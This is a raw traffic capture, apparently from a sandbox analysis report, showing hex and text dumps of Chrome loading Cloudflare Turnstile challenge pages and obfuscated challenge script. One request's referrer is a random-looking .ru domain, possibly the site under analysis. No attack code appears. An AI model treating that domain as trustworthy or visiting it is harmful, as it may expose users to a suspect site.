                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                        2024-12-18 22:16:52 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.449757104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:52 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:53 UTC1362INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:52 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 26678
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                        cross-origin-embedder-policy: require-corp
                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        origin-agent-cluster: ?1
                                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        referrer-policy: same-origin
                                                                                                        document-policy: js-profiling
                                                                                                        2024-12-18 22:16:53 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 32 38 35 31 32 34 65 37 65 64 65 39 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8f4285124e7ede94-EWRalt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:53 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                        2024-12-18 22:16:53 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.449758104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:54 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f4285124e7ede94&lang=auto HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:54 UTC331INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:54 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 119183
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42851ccfe241d3-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:54 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 68 75 6d
                                                                                                        Data Ascii: ":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_privacy":"Privacy","turnstile_refresh":"Refresh","hum
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 2c 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 38 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 37 33 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 33 33 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 33 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 33 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 32 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49
                                                                                                        Data Ascii: ,fV,g7,gd,ge,gf,gp,gA,gE,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1168))/1+parseInt(gI(1873))/2*(-parseInt(gI(1433))/3)+parseInt(gI(1176))/4+parseInt(gI(1183))/5+-parseInt(gI(1213))/6*(parseInt(gI(902))/7)+parseInt(gI
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 20 47 3c 48 7d 2c 27 71 59 70 49 57 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 7a 67 75 6d 57 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 42 63 48 6f 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 74 77 46 48 4e 27 3a 69 33 28 31 34 35 37 29 2c 27 43 4f 6f 6e 75 27 3a 69 33 28 31 31 34 34 29 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 66 77 28 68 29 2c 67 5b 69 33 28 31 33 36 33 29 5d 5b 69 33 28 31 31 35 32 29 5d 26 26 28 78 3d 78 5b 69 33 28 31 35 33 34 29 5d 28 67 5b 69 33 28 31 33 36 33 29 5d 5b 69 33 28 31 31 35 32 29 5d
